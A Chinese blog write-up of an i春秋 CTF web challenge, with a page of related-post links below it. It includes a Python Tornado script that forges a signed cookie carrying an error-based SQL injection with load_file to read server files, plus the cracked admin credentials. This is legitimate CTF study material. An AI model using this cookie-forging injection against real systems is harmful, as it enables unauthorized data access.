i春秋 “百度杯”CTF比赛 九月场 XSS平台

最新推荐文章于 2024-09-10 09:52:27 发布
最新推荐文章于 2024-09-10 09:52:27 发布
阅读量1.3k 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43610673/article/details/105040223
版权

打开题目地址是一个登录界面,题目内容提示后台有线索,也就是要先注入获取用户名密码,然后登录
在这里插入图片描述在这里插入图片描述
以为是sql注入多次尝试无果后,查看别人写的wp,是通过构造非法参数来让网页返回错误信息
在这里插入图片描述
去GitHub搜索Rtiny,https://github.com/r0ker/Rtiny-xss,查看目录下rtiny/lock.py文件
在这里插入图片描述
无过滤,可以注入,看一下set_secure_cookie是干嘛的
在这里插入图片描述
也就是说cookie是被加密过的,加密使用的key在index.php文件中,
在这里插入图片描述
下面就是要写一个py脚本,把注入语句用相同的key加密后,添加到cookie:username中,去访问/lock页面

import tornado.ioloop
import tornado.web 

settings = { 
   "cookie_secret" : "M0ehO260Qm2dD/MQFYfczYpUbJoyrkp6qYoI2hRw2jc=",
}

class MainHandler(tornado.web.RequestHandler):
    def get(self):
        self.write("Hello")
        self.set_secure_cookie("username", "' and 1=2 union select extractvalue(1,concat(0x5c,mid((select load_file('/var/www/html/f13g_ls_here.txt')),1,25)));#")
        self.write(self.get_secure_cookie("username"))

def make_app():
    return tornado.web.Application([
        (r"/index", MainHandler),
        ], **settings)

if __name__ == "__main__":
    app = make_app()
    app.listen(8082)//防止和bp端口冲突
tornado.ioloop.IOLoop.instance().start()

运行脚本,访问127.0.0.1:8082/index,从cookie中得到username的值,一步步注入得到ichuqiu|318a61264482e503090facfc4337207f|545 MD5解密得密码Myxss623,登录后台点File,得到提示
在这里插入图片描述
通过MYSQL函数 load_file读取,flag有点长要用mid()或者substr(),拼起来就行了
在这里插入图片描述在这里插入图片描述

Arnoldqqq
关注
[网络安全自学篇] 五十六.i春秋老师分享小白渗透之路及Web渗透技术总结
杨秀璋的专栏
03-05 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文讲解了Windows漏洞利用知识和DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,并编写漏洞利用脚本并实现自动化攻击。本文将分析i春秋YOU老师的小白渗透之路,并结合作者系列文章总结Web渗透技术点,非常适合初学者学习,希望对您有所帮助~
CTF资源
镜湖
08-05 971
一 个人成长 此部分内容来自 TK 教主分享的腾讯玄武实验室内部例会 PPT 资料。 1 个人成长 确立个人方向,结合工作内容,找出对应短板: 该领域主要专家们的工作是否都了解? 相关网络协议、文件格式是否熟悉? 相关的技术和主要工具是否看过、用过? 阅读只是学习过程的起点,不能止于阅读: 工具的每个参数每个菜单都要看、要试。 学习网络协议要实际抓包分析,学习文件格式要读代码实现。 学习老漏洞一定要调试,搞懂别人代码每一个字节的意义,之后要完全自己重写一个 Exploit。 细节、细节、细节,刨根问
百度CTF比赛 九月——Web-Upload
大方子
08-06 1612
============================= 个人收获: 1.PHP标记的不同写法 2.PHP标记被过滤可以试试大小写 ==============================     不知道为什么写这篇文章的时候CSDN的服务器出现问题一直无法上传图片,索性就不传了,因为这题挺简单的。   题目开始是说让我们随便上传文件,那么我们找个一句话直接上传 &lt...
百度CTF比赛 九月 XSS平台
苟有恒,必有三更眠,五更起。
11-01 1692
百度CTF比赛 九月 XSS平台 登录页面,开始时尝试注入,没有明显效果,无法判断是否存在注入。 一时没了思路,看了大佬的 WP,发现大佬们是通过构造错误参数使得web报错,从而收集信息,算是又学习到了一招。 于是,在burpsuite里面构造错误参数,报错得到信息 image 报错信息中有一个rtiny 在github上找到相应 ...
2024最全CTF入门指南、CTF夺旗赛及刷题网站(建议收藏!)
最新发布
Spontaneous_0的博客
09-10 3327
CTF(Capture The Flag),中文称为夺旗赛,是网络安全领域中一种备受关注和欢迎的竞赛形式。1. 密码学(Crypto)涉及各种加密算法的分析和破解,包括对称加密(如 AES)、非对称加密(如 RSA)、哈希函数(如 MD5、SHA-256)等。可能需要从密文或加密过程中推导出明文、找出密钥,或者验证数字签名的正确性。2. Web 安全(Web)主要针对网站和 Web 应用程序的安全漏洞进行挖掘和利用。
百度CTF比赛 九月------123
大方子
08-07 1775
==================================== 个人收获: 1.时常留意备份文件 2.文件读取漏洞 3.疑问最后一步的flag,如果加了.php双写无法绕过,只能是不加后缀的flaflagg才能绕过 ====================================   题目界面:   右键查看源码信息 出现   试了下密码为zhan...
百度CTF比赛 九月--Web--Test--Seacms海洋漏洞
残阳泼茶香的博客
04-30 1964
Web题目名称:Test 题目内容: 善于查资料,你就可以拿一血了。 给了我们一个链接 打开就是海洋cms的模板,通过 查百度发现海洋的一个search.php漏洞 Seacms漏洞分析利用复现 By Assassin ichunqiu 通过这两个 复现漏洞(注意 这里 get post 都可以) http://53290ec71e554551a257d1a5ce00ab1...
百度CTF比赛 九月Upload ---------i春秋
weixin_30763397的博客
07-07 305
题目地址:https://www.ichunqiu.com/battalion 创建题目,进入题目环境,看到 文件上传的题型,先试着随便上传一个文件1.txt 直接上传成功了!查看一下源码 看到上传在这个位置,那么接下来就在文件里加一句话木马,然后上传 然后用菜刀链接 但是报错了,好像把php给过滤了,试一下用其他方式 得到flag 转载于:https:...
ctf资源分享
Kepler-404的博客
06-11 778
分享一下tools常用的网站 ctf-wiki :https://ctf-wiki.github.io/ctf-wiki/ bugkutools:https://tool.bugku.com/ 比较全的:https://www.toolnb.com/ 国外的:http://ctf.ssleye.com/ 看雪工具库:https://tools.pediy.com/ 看雪知识库:https://ww...
写一下自已对ctf的了解,以便日后自已需要
m0_50987622的博客
11-07 6053
11.7 本人ctf小白,参加比赛基本处于摸鱼状态,也没有系统了解过ctf以及做过相关的实践和练习,但是,对这一块比较感兴趣,所以,只能说,在学习中,就跟我当初学makefile一样,做下记录,写点自已觉得对自已有用的东西,大概这样。 ctf总共分为五部分,misc杂项,crypto解密加密,pwn攻破设备、系统,reverse逆向渗透,web网络安全。500pt的题都很难。 首先,建立在你对前后端足够了解的基础上。 web安全就是黑服务器,pwn就是黑设备黑系统,至于怎么黑,仁者见仁智者见智,取决
百度CTF比赛 九月——Code
Ifish的博客
08-07 2681
题目描述 解题思路 1、打开题目链接,看到url,感觉应该是文件包含 查看源码,看到了图片的base64编码 2、感觉思路比较清晰,构造 index.php?jpg=index.php,查看源码,得到base64编码,解码,得到index.php的源码 <?php /** * Created by PhpStorm. * Date: 2015/11/16...
百度CTF比赛 九月Code
whisper_ZH的博客
09-20 882
百度CTF比赛 九月Code 打开题目可以看到 猜测文件包含,读取index.php base64解密 <?php /** * Created by PhpStorm. * Date: 2015/11/16 * Time: 1:31 */ header('content-type:text/html;charset=utf-8'); ...
i春秋 XSS闯关 wp
weixin_45253216的博客
01-16 1586
2021.1.16 又是菜鸡划水的一天。 最近看到了一个XSS题目,应该是i春秋这里刚上线的题,之前没有人做,这个属于《从0到1,CTFer成长之路》用来加深对XSS的理解最好不过了。 单击题目进入环境,发现是一个测试XSS平台,说白了就是弹窗练习。 level1 F12什么都没发现,看到URL通过GET传入username,直接简单搞一波: ?username=<script>alert(1)</script> 果然,第一关就是easy level2 第二关,F12看到
百度CTF比赛 九月 SQL-writeup
wyj_1216 House
04-05 635
题目来源: “百度CTF比赛 九月 SQL(i春秋CTF题库) http://5a2ac0925dcc43de96dd1453e3b6c1e348f7b2c59f7c4fbd.changame.ichunqiu.com/index.php?id=1 writeup 1、判断有无注入点 发现,有过滤,尝试许多,参考大神思路,发现<>绕过and过滤 继续判断注入点有无 发现无...
i春秋百度CTF比赛 九月 SQLi writeup
weixin_43442029的博客
01-12 614
0x00 打开题目链接后是一个空白页面,老规矩,去源代码找线索,于是就发现了提示login.php?id=1。 由题目可以知道这一题是SQL注入有关,那url的参数id应该就是注入点了。不过我试了好几次都没有特殊的回显,后来在网上搜到一些提示说真正的页面是l0gin.php。不得不说出题人和解出来的人脑洞是真的大。(不过之后做了一些其他题目后才发现这次比赛的出题人很喜欢这样的命名方式,可能是这样想...
百度CTF比赛 九月------code
大方子
08-16 3130
============================= 个人收获: 1.phpstorm创建的文件会自动穿件idea,里面的workspace.xml会保存目录结构 2.URL文件包含要多注意   =============================   题目:   刚开始以为是隐写,保存到本地打开看没有什么奇怪的地方,打开源码也很正常 但是URL的连接引起我...
i春秋 百度CTF比赛(二月) Misc&&web题解 By Assassin
热门推荐
Assassin
03-16 2万+
学习web,搞起来! 百度CTF比赛(二月)训练赛传送门爆破-1打开题目我们直接就看到源码,加上注释如下<?php include "flag.php"; //包含flag.php这个文件 $a = @$_REQUEST['hello']; //$a这个变量请求变量hello的值 if(!preg_match('/^\w*$/',$a )){ //正则
工匠-CTF比赛全解析:题目、解答与思路
在提供的资源中,包含了“工匠比赛”的三道题目、解答(WriteUp)和相关脚本。解答部分详细描述了解题思路,包括如何分析和解决问题的每一个步骤。脚本则可能包含了用于自动化攻击、信息获取、漏洞利用等操作的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值